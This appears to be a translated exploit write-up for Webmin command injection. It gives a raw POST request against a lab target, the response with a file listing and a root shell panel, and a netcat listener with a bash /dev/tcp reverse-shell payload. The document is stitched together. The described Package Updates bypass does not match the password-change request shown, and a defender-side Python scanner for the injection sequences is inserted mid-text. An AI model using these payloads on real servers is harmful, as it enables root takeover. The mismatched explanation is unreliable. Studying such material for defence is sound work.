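Vulnerability details:
This module exploits an arbitrary command execution vulnerability in Webmin 1.962 and earlier. Any user authorized for the "Package Updates" module can execute arbitrary commands with root privileges. The vulnerability arises from bypassing the measures taken against CVE-2019-12840. The s/\(-)|\(.)/string/g; escaping is not sufficient for prevention. Because the package name variable is placed directly into a system command, we can manipulate it with escape characters that HTTP supports. For example, we can escape the control by moving the command to the next line, which we can do with the urlencoded line values "%0A" and "%0C". In addition, for the payload to work correctly, we must append a double ampersand (&&), encoded as %26%26, to the end of the payload.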
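A defender-side check for the bypass described above, added here as an example (it is not code from the original post or from Webmin): it decodes a urlencoded POST body, flags package-name values that contain %0A, %0C, && or other shell metacharacters, and otherwise applies an allowlist. The field names `pkg` and `mode`, the allowlist pattern and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumed allowlist for Debian/RPM-style package names (not Webmin's own rule).
SAFE_PKG = re.compile(r"[A-Za-z0-9][A-Za-z0-9+._:-]*")

# Decoded characters and sequences that change how a shell parses a command line.
SHELL_BREAKERS = {
    "\n": "line feed (%0A)",
    "\x0c": "form feed (%0C)",
    "\r": "carriage return (%0D)",
    "&&": "command chaining (%26%26)",
    "|": "pipe",
    ";": "command separator",
    "`": "backtick substitution",
    "$(": "command substitution",
}

def is_safe_package_name(name: str) -> bool:
    """Allowlist check on the decoded value.

    fullmatch() is used on purpose: a pattern anchored with '$' would still
    accept a value that ends in a newline.
    """
    return SAFE_PKG.fullmatch(name) is not None

def scan_form_body(body: str, fields=("pkg",)):
    """Return (field, reason) findings for a urlencoded POST body."""
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key not in fields:  # 'pkg' is a hypothetical field name
            continue
        reasons = [label for token, label in SHELL_BREAKERS.items() if token in value]
        if not reasons and not is_safe_package_name(value):
            reasons.append("not a valid package name")
        findings.extend((key, reason) for reason in reasons)
    return findings

# Constructed sample bodies; CMD is a placeholder, not a real command.
BENIGN_BODY = "pkg=apache2&pkg=libssl1.1&mode=updates"
SUSPICIOUS_BODY = "pkg=apache2%0ACMD%26%26&mode=updates"

if __name__ == "__main__":
    for sample in (BENIGN_BODY, SUSPICIOUS_BODY):
        print(sample, "->", scan_form_body(sample))
```

The same allowlist belongs on the server side before the package name reaches any system command; detection on request bodies only covers traffic that is logged or inspected in decoded form.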
Reproduction:
The experiment was carried out on http://vulfocus.fofa.so/
Target address: https://vulfocus.fofa.so:48998/
POST request
Host: vulfocus.fofa.so:48998
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: https://vulfocus.fofa.so:48998
Connection: close
Referer: https://vulfocus.fofa.so:48998/
Cookie: redirect=1; testing=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22
Response:
<center><h3>Failed to change password : The current password is incorrectCHANGELOG config.info.ru.UTF-8 module.info.es.UTF-8 acl-lib.pl config.info.ru_RU module.info.fr acl_security.pl config.info.ru_RU.UTF-8 module.info.fr.UTF-8 backup_config.pl config.info.ru_SU module.info.hu cert_form.cgi config.info.sk module.info.hu.UTF-8 cert_issue.cgi config.info.sk.UTF-8 module.info.it cert_output.cgi config.info.sv module.info.it.UTF-8 cgi_args.pl config.info.sv.UTF-8 module.info.ja_JP.UTF-8 config config.info.tr module.info.ja_JP.euc config-ALL-linux config.info.uk_UA module.info.ko_KR.UTF-8 config-freebsd config.info.uk_UA.UTF-8 module.info.ko_KR.euc config-macos config.info.zh_CN module.info.ms_MY config-netbsd config.info.zh_CN.UTF-8 module.info.ms_MY.UTF-8 config-openbsd config.info.zh_TW.Big5 module.info.nl config-solaris-10-ALL config.info.zh_TW.UTF-8 module.info.nl.UTF-8 config-syno-linux convert.cgi module.info.no config.info convert_form.cgi module.info.no.UTF-8 config.info.ar defaultacl module.info.pl config.info.bg delete_group.cgi module.info.pl.UTF-8 config.info.bg.UTF-8 delete_groups.cgi module.info.pt config.info.ca delete_session.cgi module.info.pt.UTF-8 config.info.ca.UTF-8 delete_user.cgi module.info.pt_BR config.info.cz delete_users.cgi module.info.pt_BR.UTF-8 config.info.cz.UTF-8 edit_acl.cgi module.info.ru.UTF-8 config.info.da edit_group.cgi module.info.ru_RU config.info.da.UTF-8 edit_pass.cgi module.info.ru_RU.UTF-8 config.info.de edit_rbac.cgi module.info.ru_SU config.info.de.UTF-8 edit_sql.cgi module.info.sk config.info.es edit_sync.cgi module.info.sk.UTF-8 config.info.es.UTF-8 edit_unix.cgi module.info.sv config.info.eu edit_user.cgi module.info.sv.UTF-8 config.info.eu.UTF-8 feedback_files.pl module.info.tr config.info.fa help module.info.zh_CN config.info.fr images module.info.zh_TW.Big5 config.info.fr.UTF-8 index.cgi negativeacl config.info.hr lang openssl.cnf config.info.hu list_sessions.cgi postinstall.pl config.info.hu.UTF-8 log_parser.pl 
save_acl.cgi config.info.it makedn.cgi save_group.cgi config.info.it.UTF-8 maketables.cgi save_pass.cgi config.info.ja_JP.UTF-8 md5-lib.pl save_sql.cgi config.info.ja_JP.euc module.info save_sync.cgi config.info.ko_KR.UTF-8 module.info.ar save_twofactor.cgi config.info.ko_KR.euc module.info.bg save_unix.cgi config.info.ms_MY module.info.bg.UTF-8 save_user.cgi config.info.ms_MY.UTF-8 module.info.ca schema.cgi config.info.nl module.info.ca.UTF-8 switch.cgi config.info.nl.UTF-8 module.info.cz system_info.pl config.info.no module.info.cz.UTF-8 twofactor.pl config.info.no.UTF-8 module.info.da twofactor_form.cgi config.info.pl module.info.da.UTF-8 useradmin_update.pl config.info.pl.UTF-8 module.info.de webmin.schema config.info.pt_BR module.info.de.UTF-8 config.info.pt_BR.UTF-8 module.info.es </h3></center>
<hr> </div> <div data-autocomplete="1" class="-shell-port-"> <div class="-shell-port-container"> <div data-shell-config><i aria-label="Configuration" class="fa fa-lg fa-cogs"></i></div> <div aria-label="Close" class="-shell-port-close"></div> <div data-output="true"><pre data-xconsole></pre></div> <div class="-shell-port-cmd"> <span class="-shell-port-prompt"><span class="-shell-port-type">[@<span data-shell-host="2469abb357a9">2469abb357a9</span> <span class="-shell-port-pwd" data-home="/root" data-pwd="/root">~</span>]#</span></span><input type="text" data-command="true" autocomplete="off" spellcheck="false"><span class="-shell-port-cursor"> </span> </div> </div> </div> <div class="top-aprogress"></div> </body> </html>
Reverse shell
Remote server:
nc -vvlp 8888
test|bash -c "bash -i >%26 /dev/tcp/xxx.xxx.xxx.xxx/8888 0>%261"